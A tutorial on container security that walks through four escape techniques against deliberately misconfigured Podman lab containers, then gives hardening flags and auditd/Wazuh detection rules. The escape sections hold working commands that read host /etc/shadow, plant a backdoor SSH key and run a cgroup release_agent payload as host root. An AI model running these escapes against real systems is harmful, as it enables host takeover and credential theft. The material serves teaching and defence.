Containers are the dominant deployment unit in modern infrastructure, and the security model behind them is widely misunderstood. The abstraction is clean — an isolated filesystem, process tree, and network stack — but underneath, a container is a set of kernel features applied to a regular Linux process. There is no hypervisor. There is no hardware boundary. Every container escape exploits the fact that the host kernel is shared.
This tutorial demonstrates four container escape techniques against deliberately misconfigured containers, then shows how to harden against each one. The goal is to build an accurate mental model of what containers actually isolate, where the boundaries are thin, and what configurations break them entirely.
How containers isolate
A container is not a VM. A virtual machine runs its own kernel on emulated (or virtualized) hardware. A container runs as a process on the host kernel, with isolation enforced by four kernel subsystems working together.
Virtual Machine Container
┌─────────────────────────┐ ┌─────────────────────────┐
│ Guest Userspace │ │ Container Process │
├─────────────────────────┤ │ (isolated view) │
│ Guest Kernel │ └────────────┬────────────┘
├─────────────────────────┤ │
│ Hypervisor │ ┌────────────┴────────────┐
├─────────────────────────┤ │ Namespaces │
│ Host Kernel │ │ Cgroups │
├─────────────────────────┤ │ Seccomp │
│ Host Hardware │ │ Capabilities │
└─────────────────────────┘ ├─────────────────────────┤
│ Host Kernel (shared) │
├─────────────────────────┤
│ Host Hardware │
└─────────────────────────┘Namespaces give each container its own view of system resources. Linux supports seven namespace types:
| Namespace | Isolates | Effect |
|---|---|---|
| PID | Process IDs | Container sees only its own processes, PID 1 is the entrypoint |
| NET | Network stack | Container gets its own interfaces, routing table, iptables rules |
| MNT | Filesystem mounts | Container sees only its own mount tree |
| UTS | Hostname and domain | Container can set its own hostname |
| IPC | System V IPC, POSIX message queues | Shared memory segments are isolated |
| USER | User and group IDs | UID 0 inside can map to unprivileged UID on host |
| cgroup | Cgroup root view | Container sees only its own cgroup hierarchy |
Cgroups v2 limit resource consumption. They prevent a container from exhausting host CPU, memory, I/O, or PIDs. Cgroups do not provide security isolation — they are a denial-of-service prevention mechanism. However, the cgroup filesystem itself can become an escape vector, as we’ll see. Cgroup v1 had a flat hierarchy with separate controllers (cpu, memory, blkio, etc.) each mounted independently. Cgroup v2 uses a unified hierarchy, which simplifies management and — critically for this tutorial — removes the release_agent mechanism that enabled one of the escape techniques we’ll demonstrate.
Seccomp (Secure Computing Mode) filters syscalls at the kernel level. A seccomp filter is a BPF program attached to a process that intercepts every syscall before it enters the kernel. The default Docker/Podman seccomp profile blocks roughly 44 of the 300+ syscalls on x86_64, including dangerous ones like mount, reboot, kexec_load, ptrace, and bpf. Disabling seccomp (or running privileged) removes this filter entirely, exposing the full syscall surface to the container process.
Linux capabilities split root’s monolithic power into ~41 discrete permissions. Instead of a binary root/non-root check, the kernel evaluates specific capabilities for each privileged operation. CAP_NET_BIND_SERVICE allows binding to ports below 1024. CAP_SYS_ADMIN allows mounting filesystems, configuring namespaces, and dozens of other operations (it’s the “catch-all” capability and the most dangerous). A default container gets a reduced set — typically CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_NET_BIND_SERVICE, and a handful of others. Running with --privileged grants all capabilities, disables seccomp, and gives device access, which is functionally equivalent to root on the host.
Insight
The shared kernel boundary Every escape in this tutorial exploits the same fundamental fact: the container and the host share a kernel. Namespaces control what a process can see. Capabilities and seccomp control what it can do. But if you grant enough capabilities or disable enough restrictions, the process can reach through those boundaries because the kernel doesn’t distinguish between “container root” and “host root” at the syscall level — it only checks capabilities.
Lab setup
This lab uses Podman to create deliberately vulnerable containers. Each container is configured with a specific misconfiguration that enables one escape technique.
Warning
Run this lab only in a disposable VM or test environment. These containers are intentionally misconfigured to allow full host compromise. Never run these configurations on production systems, shared machines, or any system with data you care about.
Create the lab setup script.
#!/bin/bash
# container-escape-lab.sh
# Starts four deliberately vulnerable containers for escape practice.
# ONLY run this in an isolated VM.
set -euo pipefail
LAB_NET="escape-lab"
IMAGE="docker.io/library/ubuntu:24.04"
echo "[*] Pulling base image..."
podman pull "$IMAGE"
echo "[*] Creating lab network..."
podman network create "$LAB_NET" 2>/dev/null || true
# Use a Docker-compatible API socket for Escape 2.
if [ -S /var/run/docker.sock ]; then
API_SOCK=/var/run/docker.sock
elif [ -S /run/podman/podman.sock ]; then
API_SOCK=/run/podman/podman.sock
elif [ -n "${XDG_RUNTIME_DIR:-}" ] && [ -S "${XDG_RUNTIME_DIR}/podman/podman.sock" ]; then
API_SOCK="${XDG_RUNTIME_DIR}/podman/podman.sock"
else
echo "[!] No Docker-compatible container API socket found."
echo "[!] Start Docker, or enable Podman socket:"
echo " systemctl enable --now podman.socket"
exit 1
fi
echo "[*] Using API socket: $API_SOCK"
echo "[*] Starting Escape 1: Privileged container"
podman run -d --name escape1-privileged \
--privileged \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo "[*] Starting Escape 2: Docker socket mount"
podman run -d --name escape2-socket \
-v "$API_SOCK:/var/run/docker.sock" \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo "[*] Starting Escape 3: Shared PID namespace"
podman run -d --name escape3-pidhost \
--pid=host \
--privileged \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo "[*] Starting Escape 4: Writable cgroup (cgroup v1)"
podman run -d --name escape4-cgroup \
--security-opt apparmor=unconfined \
--security-opt seccomp=unconfined \
--cap-add=SYS_ADMIN \
--cgroupns=host \
--network "$LAB_NET" \
"$IMAGE" sleep infinity
echo ""
echo "[+] Lab containers running:"
podman ps --filter "network=$LAB_NET" --format "table {{.Names}}\t{{.Status}}"
echo ""
echo "[*] Enter a container with: podman exec -it <name> bash"
echo "[*] Tear down with: podman rm -f escape1-privileged escape2-socket escape3-pidhost escape4-cgroup"Install tools inside each container as needed.
# For each container, install basic utilities
for c in escape1-privileged escape2-socket escape3-pidhost escape4-cgroup; do
podman exec "$c" apt-get update -qq
podman exec "$c" apt-get install -y -qq curl util-linux iproute2 procps libcap2-bin python3 openssh-client > /dev/null
doneTip
If your test VM uses cgroup v2 only (most modern distros), Escape 4 won’t work as written. To test the cgroup release_agent technique, boot the VM with
systemd.unified_cgroup_hierarchy=0on the kernel command line to enable the hybrid or legacy cgroup hierarchy.
Escape 1: Privileged container to host filesystem
The --privileged flag is the most dangerous container configuration. It grants all Linux capabilities, disables seccomp, mounts all host devices into the container’s /dev, and removes AppArmor/SELinux confinement. It exists for cases like running Docker-in-Docker or accessing hardware directly — but it completely destroys the container security boundary.
Identifying a privileged container
Enter the container and check your capabilities.
podman exec -it escape1-privileged bashInside the container, list the current capabilities.
capsh --print | grep "Current:"A privileged container returns a full bitmask. You’ll see every capability listed, including dangerous ones like CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_READ_SEARCH, and CAP_SYS_RAWIO.
Check for device access.
ls /dev/sda* /dev/vda* /dev/nvme* 2>/dev/nullIn a normal container, /dev contains only a few virtual devices. In a privileged container, you’ll see the host’s actual block devices — the physical (or virtual) disks.
Mounting the host filesystem
Identify the host root partition. If your VM uses /dev/sda1 or /dev/vda1:
fdisk -l /dev/sda 2>/dev/null || fdisk -l /dev/vda 2>/dev/nullMount the host root filesystem.
mkdir -p /mnt/host
mount /dev/sda1 /mnt/hostYou now have full read-write access to the host’s filesystem from inside the container.
# Read the host's shadow file
cat /mnt/host/etc/shadow
# List host users with login shells
grep -v nologin /mnt/host/etc/passwd
# Read the host's SSH keys
ls -la /mnt/host/root/.ssh/
cat /mnt/host/root/.ssh/authorized_keysWriting persistent access
Add an SSH key to the host’s authorized_keys.
# Generate a key pair inside the container
ssh-keygen -t ed25519 -f /tmp/backdoor -N ""
# Write the public key to the host's authorized_keys
mkdir -p /mnt/host/root/.ssh
cat /tmp/backdoor.pub >> /mnt/host/root/.ssh/authorized_keys
chmod 600 /mnt/host/root/.ssh/authorized_keysFull escape with nsenter
With --privileged, you can also use nsenter to enter the host’s namespaces directly. PID 1 on the host is always init (or systemd).
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bashThis drops you into a shell that is, for all practical purposes, running directly on the host as root. You’ve left the container entirely.
# Verify you're on the host
hostname
cat /etc/os-release
ps aux | head -20Insight
Why —privileged exists The
--privilegedflag was originally designed for running the Docker daemon inside a container (DinD) and for containers that need direct hardware access. In both cases, the container must operate with host-level privileges. The problem is that--privilegedis often used as a shortcut for debugging permission issues, and it persists into production. Any container running with--privilegedis not actually contained.
Escape 2: Docker socket mount
Mounting /var/run/docker.sock into a container is extremely common in CI/CD pipelines (Jenkins, GitLab CI), monitoring tools (cAdvisor, Datadog), and container management UIs (Portainer). The Docker socket is a Unix socket that provides full, unauthenticated access to the Docker API. Access to this socket is equivalent to root on the host.
The Docker API attack
Enter the container.
podman exec -it escape2-socket bashVerify the socket is available.
ls -la /var/run/docker.sockYou don’t need the Docker CLI to exploit this. The Docker API speaks HTTP over the Unix socket, and curl can talk to Unix sockets directly.
List running containers via the API.
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | \
python3 -c "import sys,json; [print(c['Names'][0], c['Image']) for c in json.load(sys.stdin)]"Creating an escape container
Create a new container via the API that mounts the host root filesystem.
# Create the container
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/create?name=escape-host \
-H "Content-Type: application/json" \
-d '{
"Image": "ubuntu:24.04",
"Cmd": ["/bin/bash"],
"Tty": true,
"OpenStdin": true,
"HostConfig": {
"Binds": ["/:/hostfs"],
"Privileged": true
}
}'
# Start it
curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/escape-host/startNow attach to the new container — or more practically, use the exec endpoint to run commands.
# Execute a command in the escape container to read host files
# First, create the exec instance
EXEC_ID=$(curl -s --unix-socket /var/run/docker.sock \
-X POST http://localhost/containers/escape-host/exec \
-H "Content-Type: application/json" \
-d '{"Cmd":["cat","/hostfs/etc/shadow"],"AttachStdout":true}' | \
python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")
# Then start it
curl -s --unix-socket /var/run/docker.sock \
-X POST "http://localhost/exec/${EXEC_ID}/start" \
-H "Content-Type: application/json" \
-d '{"Detach":false}'This returns the contents of the host’s /etc/shadow, demonstrating full host filesystem access through a container that only had the Docker socket mounted.
The broader implication
The Docker socket grants the ability to:
- Create privileged containers with host volume mounts
- Execute arbitrary commands on the host via new containers
- Read and write any file on the host filesystem
- Modify running containers and images
- Stop or remove other containers (denial of service)
Warning
“Read-only” Docker socket mounts (
-v /var/run/docker.sock:/var/run/docker.sock:ro) do not help. The:roflag prevents the container from deleting or replacing the socket file. It does nothing to restrict the API calls made through the socket. The API itself has no read-only mode.
Escape 3: Namespace escape via nsenter
When a container runs with --pid=host, the PID namespace isolation is removed. The container process can see every process on the host. Combined with sufficient capabilities (which --privileged provides), this allows direct entry into the host’s namespaces.
Seeing host processes
Enter the container.
podman exec -it escape3-pidhost bashList processes. You’ll see the full host process tree, not just the container’s processes.
ps auxYou’ll see systemd (PID 1), kernel threads, SSH daemons, the container runtime, and everything else running on the host. In a properly namespaced container, ps aux would only show the container’s entrypoint process and its children.
Entering the host namespaces
Each process on Linux has a set of namespace references in /proc/<pid>/ns/. When you can see host PID 1, you can enter its namespaces.
ls -la /proc/1/ns/Use nsenter to enter all of PID 1’s namespaces.
nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bashEach flag enters a specific namespace of the target process:
| Flag | Namespace | Effect |
|---|---|---|
--mount | MNT | See the host’s filesystem mounts |
--uts | UTS | See the host’s hostname |
--ipc | IPC | Access the host’s shared memory |
--net | NET | Use the host’s network stack |
--pid | PID | See the host’s process tree |
After nsenter, you’re operating in the host’s context. Verify it.
hostname
mount | head -10
ip addr
cat /etc/hostnameWhy —pid=host is used
The --pid=host flag is typically used for debugging and monitoring containers — tools that need to observe host processes. It’s sometimes combined with --privileged for troubleshooting. The combination of both flags is functionally equivalent to running directly on the host.
Tip
If you only need process visibility for monitoring (e.g., running
htopor a metrics exporter), consider using/procfrom a mounted host path instead of sharing the PID namespace. This provides read-only visibility without enabling namespace traversal.
Escape 4: cgroup release_agent (CVE-2022-0492)
This escape is more subtle than the previous three. It doesn’t require --privileged or a mounted socket — just CAP_SYS_ADMIN and the ability to write to the cgroup filesystem. It exploits the release_agent mechanism in cgroup v1.
How cgroup release_agent works
In cgroup v1, each cgroup hierarchy has a release_agent file at its root. When a cgroup has notify_on_release set to 1 and the last process in that cgroup exits, the kernel executes the program specified in release_agent — and it executes it on the host, outside any container namespace.
┌─────────────────────────────────────────────┐
│ Container │
│ │
│ 1. Create child cgroup │
│ 2. Set notify_on_release = 1 │
│ 3. Write host path to release_agent │
│ 4. Put a process in the child cgroup │
│ 5. Kill the process (last one exits) │
│ │
└──────────────────────┬──────────────────────┘
│ cgroup event
▼
┌─────────────────────────────────────────────┐
│ Host Kernel │
│ │
│ Kernel executes release_agent script │
│ → runs ON THE HOST, as root │
│ → outside all container namespaces │
│ │
└─────────────────────────────────────────────┘Executing the escape
Enter the container.
podman exec -it escape4-cgroup bashFirst, find the container’s location on the host filesystem. The container’s filesystem is visible from the host at a path we can discover through the cgroup mount.
# Find the cgroup mount point
mount | grep cgroupIdentify the cgroup path for this container and the writable hierarchy.
# Find a writable cgroup hierarchy
# In cgroup v1, RDMA or other hierarchies may be writable
CGROUP_MOUNT=$(mount | grep "cgroup " | head -1 | awk '{print $3}')
echo "Cgroup mount: $CGROUP_MOUNT"Now determine the host path to the container’s filesystem. This is needed because the release_agent script will execute on the host, so it needs a path the host kernel can resolve.
# Get the host path to the container's filesystem
# This is available via /proc/1/mountinfo
HOST_PATH=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /proc/1/mountinfo | head -1)
if [ -z "$HOST_PATH" ]; then
echo "Could not resolve host overlay path from /proc/1/mountinfo"
exit 1
fi
echo "Host path: $HOST_PATH"Create the exploit.
# Create the payload script in the container rootfs.
# The host sees it at $HOST_PATH/cmd.sh.
CONTAINER_SCRIPT="/cmd.sh"
CONTAINER_OUTPUT="/output_from_host"
HOST_SCRIPT="$HOST_PATH/cmd.sh"
cat > "$CONTAINER_SCRIPT" << 'INNEREOF'
#!/bin/sh
ps aux > /output_from_host
cat /etc/hostname >> /output_from_host
id >> /output_from_host
INNEREOF
chmod +x "$CONTAINER_SCRIPT"
# Create a child cgroup
mkdir -p "$CGROUP_MOUNT/escape"
# Set notify_on_release
echo 1 > "$CGROUP_MOUNT/escape/notify_on_release"
# Set the release_agent to our script (using the host-visible path)
echo "$HOST_SCRIPT" > "$CGROUP_MOUNT/release_agent"
# Trigger: put a process in the child cgroup, then let it exit
sh -c "echo \$\$ > $CGROUP_MOUNT/escape/cgroup.procs && sleep 0.1"After the sh process exits, it’s the last process in the escape cgroup. The kernel invokes the release_agent on the host.
# Check the output (give it a moment)
sleep 1
cat "$CONTAINER_OUTPUT"If successful, you’ll see the host’s process list, hostname, and uid=0(root) — proof that the script executed on the host as root.
Requirements and limitations
This escape requires a specific combination of conditions:
- cgroup v1: The
release_agentmechanism doesn’t exist in cgroup v2. Most modern distributions default to cgroup v2. - CAP_SYS_ADMIN: Needed to mount cgroup filesystems and write to
release_agent. - Host cgroup namespace or writable cgroup: The container must be able to write to the cgroup hierarchy root, which requires
--cgroupns=hostor equivalent. - No AppArmor/SELinux: Mandatory access control policies can block writes to cgroup files.
CVE-2022-0492 addressed the specific kernel bug where unprivileged users within a user namespace could write to release_agent, but the underlying mechanism still works when CAP_SYS_ADMIN is explicitly granted.
Insight
The cgroup escape pattern This technique is notable because it uses a legitimate kernel feature as designed. The
release_agentwas intended for cleanup tasks when a cgroup becomes empty. The kernel correctly executes the specified program when the last process exits. The vulnerability isn’t a bug in the traditional sense — it’s a feature that was never designed with container isolation in mind, operating on a kernel subsystem that predates containers by years.
Secure container configuration
Each escape exploited a specific misconfiguration. Here’s the defense for each one, and at the end, a single hardened container command that applies all protections simultaneously.
Defense against Escape 1: Drop capabilities
Never use --privileged. Instead, drop all capabilities and add back only what the application needs.
podman run -d --name hardened-app \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
my-app:latestThe --cap-drop=ALL removes every capability. --cap-add selectively restores only what’s required. Most applications need at most two or three capabilities. If you don’t know which ones your application needs, run it with all capabilities dropped and add back whichever ones the error messages indicate are missing.
Defense against Escape 2: Never mount the Docker socket
There is no safe way to mount the Docker socket into a container. Any access to the socket is full API access.
For CI/CD pipelines that need to build container images, use alternatives:
- Kaniko: Builds container images in userspace without a Docker daemon
- Buildah: Builds OCI images without requiring a daemon socket
- Podman: Daemonless container management; no socket to mount
For monitoring tools that need container metadata, use the read-only container API endpoints via a proxy that restricts which API calls are allowed.
Defense against Escape 3: Isolate PID namespace
Never use --pid=host in production. The default behavior (--pid=container) is correct for almost all workloads.
# Explicitly set (this is the default, but making it explicit prevents accidents)
podman run -d --pid=private my-app:latestDefense against Escape 4: Restrict cgroup access
Don’t grant CAP_SYS_ADMIN unless absolutely necessary. Use cgroup v2 (which doesn’t have the release_agent mechanism). Keep containers in their own cgroup namespace.
# Ensure containers use their own cgroup namespace (default in modern Podman)
podman run -d --cgroupns=private my-app:latestDefense in depth: The hardened run command
Apply all defenses simultaneously.
podman run -d --name production-app \
--cap-drop=ALL \
--cap-add=NET_BIND_SERVICE \
--read-only \
--tmpfs /tmp:rw,noexec,nosuid,size=64m \
--security-opt=no-new-privileges \
--security-opt seccomp=/etc/containers/seccomp.json \
--pids-limit=256 \
--memory=512m \
--cpus=1 \
--pid=private \
--cgroupns=private \
--network=slirp4netns \
--user 1000:1000 \
my-app:latestBreaking this down:
| Flag | Defense |
|---|---|
--cap-drop=ALL --cap-add=NET_BIND_SERVICE | Minimal capabilities |
--read-only | Immutable rootfs prevents writing exploit scripts |
--tmpfs /tmp:rw,noexec,nosuid,size=64m | Writable temp with noexec, so scripts can’t be executed from /tmp |
--security-opt=no-new-privileges | Prevents suid binaries from gaining privileges |
--security-opt seccomp=... | Custom seccomp profile blocks dangerous syscalls |
--pids-limit=256 | Prevents fork bombs |
--memory=512m --cpus=1 | Resource limits prevent host starvation |
--pid=private | Own PID namespace |
--cgroupns=private | Own cgroup namespace |
--network=slirp4netns | Rootless networking (no CAP_NET_ADMIN needed) |
--user 1000:1000 | Non-root user inside the container |
Tip
Rootless Podman as a baseline Running Podman rootless (as a non-root user) applies user namespace mapping automatically. Root inside the container maps to your unprivileged UID on the host. Even if an attacker escapes the container, they land as an unprivileged user. This single change mitigates the majority of container escape techniques because most escapes require true host root privileges to be useful.
Seccomp profile hardening
The default seccomp profile is a good start, but you can tighten it further. Generate a profile specific to your application by tracing its syscalls, then locking down the allowlist.
# Trace syscalls your application uses during a test run
podman run --rm --security-opt seccomp=unconfined \
--annotation io.containers.trace-syscall="of:/tmp/seccomp-profile.json" \
my-app:latest /run-test-suite.sh
# Use the generated profile
podman run -d \
--security-opt seccomp=/tmp/seccomp-profile.json \
my-app:latestThis produces a minimal seccomp profile that allows only the syscalls your application actually uses during testing.
Detection
Hardening prevents escapes, but defense in depth requires detection as well. The following rules cover auditd (host-level syscall auditing) and Wazuh (SIEM correlation and alerting) for each escape vector.
Detecting mount syscalls from containers
Escape 1 uses mount to attach host block devices. Container processes should almost never call mount.
Auditd rule:
# /etc/audit/rules.d/container-mount.rules
# Watch for mount syscalls from processes in non-root mount namespaces
-a always,exit -F arch=b64 -S mount -S umount2 -F auid>=1000 -F key=container_mount
-a always,exit -F arch=b64 -S mount -S umount2 -F exe=/usr/bin/nsenter -F key=container_mountWazuh rule to alert on the auditd events:
<group name="container_escape,">
<rule id="100410" level="12">
<if_sid>80700</if_sid>
<field name="audit.key">container_mount</field>
<description>Mount syscall detected from container context — possible container escape attempt.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
</group>Detecting Docker socket access
Escape 2 communicates with the Docker socket from inside a container. Monitor access to the socket.
Auditd rule:
# /etc/audit/rules.d/docker-socket.rules
# Watch for access to the Docker socket
-w /var/run/docker.sock -p rwa -k docker_socket_accessWazuh rule:
<group name="container_escape,">
<rule id="100411" level="10">
<if_sid>80700</if_sid>
<field name="audit.key">docker_socket_access</field>
<description>Docker socket accessed — check if source process is authorized.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,</group>
</rule>
<!-- Higher severity when curl or wget accesses the socket -->
<rule id="100412" level="14">
<if_sid>100411</if_sid>
<field name="audit.exe">(curl|wget|python)</field>
<description>Docker socket accessed by unusual process — likely container escape via API abuse.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
</group>Detecting nsenter usage
Escapes 1 and 3 use nsenter to cross namespace boundaries. This binary should rarely be executed in production.
Auditd rule:
# /etc/audit/rules.d/nsenter.rules
# Watch for nsenter execution
-w /usr/bin/nsenter -p x -k nsenter_executionWazuh rule:
<group name="container_escape,">
<rule id="100413" level="13">
<if_sid>80700</if_sid>
<field name="audit.key">nsenter_execution</field>
<description>nsenter executed — possible namespace escape from container.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
</group>Detecting cgroup release_agent modification
Escape 4 writes to the release_agent file. This file should never be modified by container processes.
Auditd rule:
# /etc/audit/rules.d/cgroup-release-agent.rules
# Watch for writes to any release_agent file in cgroup hierarchies
-w /sys/fs/cgroup/ -p wa -k cgroup_modificationWazuh rule:
<group name="container_escape,">
<rule id="100414" level="14">
<if_sid>80700</if_sid>
<field name="audit.key">cgroup_modification</field>
<match>release_agent</match>
<description>cgroup release_agent modified — possible CVE-2022-0492 container escape.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,privilege_escalation,</group>
</rule>
<rule id="100415" level="12">
<if_sid>80700</if_sid>
<field name="audit.key">cgroup_modification</field>
<match>notify_on_release</match>
<description>cgroup notify_on_release modified — possible setup for cgroup escape.</description>
<mitre>
<id>T1611</id>
</mitre>
<group>container_escape,</group>
</rule>
</group>Centralized alert dashboard
With these rules deployed, Wazuh will generate alerts at levels 10-14 for container escape activity. A practical alert strategy:
| Alert Level | Escape Vector | Response |
|---|---|---|
| 14 | Docker socket + unusual process | Immediate investigation |
| 14 | cgroup release_agent write | Immediate investigation |
| 13 | nsenter execution | Investigate within 15 minutes |
| 12 | Mount syscall from container | Investigate within 1 hour |
| 10 | Docker socket access | Review daily |
Tip
Reduce noise with context The auditd rules above will generate events for legitimate container operations too (e.g., the container runtime itself calls
mount). To reduce false positives, add-F exe!=/usr/bin/runcand similar exclusions for your container runtime. The Wazuh rules can use<if_sid>chains to require multiple suspicious behaviors before alerting at high severity.
Where to go from here
This tutorial covered four escape techniques against specific misconfigurations. The container escape landscape is broader than this — other vectors include kernel exploits (CVE-2022-0847 Dirty Pipe, CVE-2016-5195 Dirty COW), container runtime vulnerabilities (CVE-2019-5736 allowed overwriting the host runc binary from within a container), image supply chain attacks (malicious base images, compromised registries), and cloud metadata service abuse from within containers (SSRF to 169.254.169.254 to steal IAM credentials). Each of those deserves its own treatment.
For production environments, consider these additional layers beyond what this tutorial covered:
- gVisor or Kata Containers: These provide a stronger isolation boundary. gVisor intercepts syscalls with a user-space kernel, reducing the host kernel’s attack surface. Kata Containers run each container in a lightweight VM, providing hardware-level isolation while maintaining container ergonomics.
- Pod Security Standards: Kubernetes provides three built-in policy levels (Privileged, Baseline, Restricted) that enforce many of the hardening measures covered here at the cluster level, preventing misconfigured containers from being deployed in the first place.
- Runtime security tools: Falco, Tracee, and Tetragon can detect escape attempts in real time by monitoring syscalls, file access patterns, and network activity from eBPF hooks, providing deeper visibility than auditd alone.
The key takeaway is structural: containers provide process-level isolation, not machine-level isolation. Every configuration flag you set either strengthens or weakens that boundary. Start from the hardened baseline, grant only what’s necessary, monitor for the specific syscalls and file accesses that indicate boundary violations, and treat any container with --privileged or a mounted Docker socket as equivalent to root on the host — because it is.